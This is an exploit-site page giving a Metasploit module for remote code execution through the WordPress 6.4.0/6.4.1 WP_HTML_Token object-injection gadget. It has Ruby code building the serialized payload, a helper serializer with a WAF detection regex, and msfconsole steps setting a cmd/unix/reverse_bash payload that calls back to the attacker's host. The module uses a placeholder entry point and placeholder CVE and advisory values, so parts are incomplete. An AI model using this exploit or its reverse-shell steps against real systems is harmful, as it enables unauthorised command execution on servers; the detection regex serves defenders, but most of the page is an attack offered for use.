## https://sploitus.com/exploit?id=9B4CDCBD-945B-52C4-AC76-5135772CE450
To create a Metasploit module for the RCE gadget in the WordPress `WP_HTML_Token` class, we'll focus on crafting the serialized object that triggers it. In WordPress 6.4.0 and 6.4.1 the class's `__destruct()` runs `call_user_func($this->on_destroy, $this->bookmark_name)` on whatever those two public properties hold, so an attacker-controlled instance that reaches `unserialize()` executes an arbitrary single-argument callable (for example `system` with a shell command in `bookmark_name`) the moment the object is destroyed. WordPress 6.4.2 closed this by adding a `__wakeup()` that throws on unserialization. Core itself does not pass attacker-controlled input to `unserialize()` on a reachable path, so the gadget needs an entry point, typically a plugin that unserializes request data; the module below uses a login POST purely as a placeholder for that entry point.
### Metasploit Module
Save the following code as `wordpress_wp_html_token_rce.rb` in the `modules/exploits/multi/http` directory of your Metasploit Framework installation.
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # Supplies wordpress_and_online? and wordpress_version for the check method.
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress WP_HTML_Token Unserialization RCE',
        'Description' => %q{
          This module abuses the PHP object injection gadget in the WordPress
          WP_HTML_Token class shipped with WordPress 6.4.0 and 6.4.1. The class's
          __destruct() method calls call_user_func($this->on_destroy, $this->bookmark_name),
          so an unserialized instance with on_destroy set to "system" runs the
          contents of bookmark_name as a shell command. WordPress core never passes
          attacker-controlled data to unserialize() itself; the login POST used here
          is a placeholder for an entry point (typically a plugin) that does.
        },
        'Author' => [
          'Your Name' # OneArch
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-XXXX'], # Replace with the correct CVE number
          ['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
        ],
        'DisclosureDate' => 'Aug 03 2024',
        # The gadget runs a shell command through system(), so the module takes
        # command payloads (cmd/unix/*), not PHP payloads.
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [
          ['WordPress 6.4.0 - 6.4.1', {}]
        ],
        'DefaultTarget' => 0,
        'Privileged' => false,
        'Payload' => {
          'BadChars' => "\x00"
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the WordPress installation', '/'])
      ]
    )
  end

  def check
    return Exploit::CheckCode::Unknown('Target is unreachable or is not WordPress') unless wordpress_and_online?

    version = wordpress_version
    return Exploit::CheckCode::Detected('WordPress found, but the version could not be read') if version.nil?

    # Only 6.4.0 and 6.4.1 ship the call_user_func destructor unprotected;
    # 6.4.2 added a __wakeup() that throws on unserialize().
    current = Rex::Version.new(version)
    if current.between?(Rex::Version.new('6.4.0'), Rex::Version.new('6.4.1'))
      return Exploit::CheckCode::Appears("WordPress #{version} ships the vulnerable WP_HTML_Token gadget")
    end

    Exploit::CheckCode::Safe("WordPress #{version} does not ship the gadget")
  end

  # PHP-serialized WP_HTML_Token whose destructor runs system(cmd).
  # PHP string lengths are byte counts, so use bytesize rather than length.
  def gadget(cmd)
    props = [
      %(s:13:"bookmark_name";s:#{cmd.bytesize}:"#{cmd}";),
      %(s:9:"node_name";N;),
      %(s:21:"has_self_closing_flag";b:0;),
      %(s:10:"on_destroy";s:6:"system";)
    ]
    %(O:13:"WP_HTML_Token":4:{#{props.join}})
  end

  def exploit
    serialized_payload = gadget(payload.encoded)
    print_status("Sending WP_HTML_Token gadget (#{serialized_payload.bytesize} bytes)")

    # NOTE: wp-login.php does not unserialize() the password. This request only
    # marks where the real entry point (an unserialize() call on request data,
    # normally in a plugin) must be substituted; without one the destructor never runs.
    post_data = {
      'user_login' => Rex::Text.rand_text_alphanumeric(8..12),
      'user_pass' => serialized_payload,
      'wp-submit' => 'Log In',
      'redirect_to' => normalize_uri(target_uri.path, 'wp-admin/'),
      'testcookie' => '1'
    }

    # A blocking reverse shell keeps system() from returning, so the HTTP
    # response may never arrive; a missing response is not treated as failure.
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
      'vars_post' => post_data
    })

    handler
  end
end
```
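As an added example (not part of the module above and not WordPress code), here is the same gadget built with a small PHP serializer instead of hand-counted string lengths, together with a matching regex that a WAF rule or log-review script can use to flag the gadget in request bodies. It assumes the `WP_HTML_Token` property layout of WordPress 6.4.0/6.4.1 (`bookmark_name`, `node_name`, `has_self_closing_flag`, `on_destroy`); the function names (`php_serialize`, `php_object`, `wp_html_token_gadget`, `wp_html_token_gadget?`, `GADGET_RE`) and the sample request line are this example's own.

```ruby
# Added example: correct PHP serialization of the WP_HTML_Token gadget
# (WordPress 6.4.0/6.4.1 property layout assumed) plus a detector for it.

# Minimal PHP serializer covering the scalar and array types the gadget needs.
# PHP's s:N:"..." prefix is a byte count, so bytesize is used, not length.
def php_serialize(value)
  case value
  when nil     then 'N;'
  when true    then 'b:1;'
  when false   then 'b:0;'
  when Integer then "i:#{value};"
  when String  then "s:#{value.bytesize}:\"#{value}\";"
  when Hash
    body = value.map { |k, v| php_serialize(k) + php_serialize(v) }.join
    "a:#{value.size}:{#{body}}"
  else
    raise ArgumentError, "unsupported type #{value.class}"
  end
end

# Serialize a PHP object whose public properties are given as an ordered Hash.
# unserialize() does not care about property order, only that names match.
def php_object(class_name, props)
  body = props.map { |k, v| php_serialize(k.to_s) + php_serialize(v) }.join
  "O:#{class_name.bytesize}:\"#{class_name}\":#{props.size}:{#{body}}"
end

# WP_HTML_Token::__destruct() in 6.4.0/6.4.1 runs
#   call_user_func($this->on_destroy, $this->bookmark_name)
# so any single-argument callable works; 'system' makes bookmark_name a shell command.
def wp_html_token_gadget(callable, argument)
  php_object('WP_HTML_Token',
             'bookmark_name'         => argument,
             'node_name'             => nil,
             'has_self_closing_flag' => false,
             'on_destroy'            => callable)
end

# Detection side: a serialized WP_HTML_Token whose on_destroy is a string
# (a function name) is never produced by WordPress itself and is worth alerting on.
GADGET_RE = /O:13:"WP_HTML_Token":\d+:\{.*?s:10:"on_destroy";s:\d+:"[^"]+";/m

def wp_html_token_gadget?(text)
  GADGET_RE.match?(text)
end

if $PROGRAM_NAME == __FILE__
  gadget = wp_html_token_gadget('system', 'id')
  puts gadget
  # Constructed sample request body, as it would appear in a WAF or access log.
  puts wp_html_token_gadget?("user_pass=#{gadget}&wp-submit=Log+In")
end
```

The detector only recognises a string callable; an array callable (`[object, 'method']`) or a nested object would need a real parser of the unserialize format rather than a regex.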
### Usage Instructions
1. **Save the Module**:
Save the module as `wordpress_wp_html_token_rce.rb` in the `modules/exploits/multi/http` directory of your Metasploit Framework installation.
```bash
/path/to/metasploit-framework/modules/exploits/multi/http/wordpress_wp_html_token_rce.rb
```
2. **Load Metasploit**:
Start Metasploit Framework by opening a terminal and running:
```bash
msfconsole
```
3. **Use the New Module**:
In the Metasploit console, load the new exploit module using the following command:
```bash
use exploit/multi/http/wordpress_wp_html_token_rce
```
4. **Configure and Run**:
Set the necessary options, such as `RHOSTS`, `RPORT`, `TARGETURI`, `LHOST` and a command payload (`cmd/unix/*`) matching the module's `unix`/`cmd` target, run `check` to confirm the WordPress version is 6.4.0 or 6.4.1, then run the module.
```bash
msf6 > use exploit/multi/http/wordpress_wp_html_token_rce
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set RHOSTS target_ip
RHOSTS => target_ip
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LHOST your_ip
LHOST => your_ip
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > check
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > run
```
### Important Considerations
- Ensure you have the appropriate permissions before testing or exploiting any systems.
- This module is designed for educational and testing purposes. Always test in a safe and controlled environment before using it on any production systems.
This Metasploit module builds the serialized `WP_HTML_Token` gadget, posts it to the target, and starts the handler. Before relying on it, confirm three things the module cannot verify on its own: the target runs WordPress 6.4.0 or 6.4.1 (use `check`; 6.4.2 and later refuse to unserialize the class), there is a code path that actually passes the injected value to `unserialize()` (replace the `wp-login.php` request with that entry point, since the login form does not unserialize the password), and `system` is not listed in PHP's `disable_functions` (otherwise `is_callable()` in the destructor returns false and nothing runs). Adjust the payload and request as necessary for the specific entry point and target environment.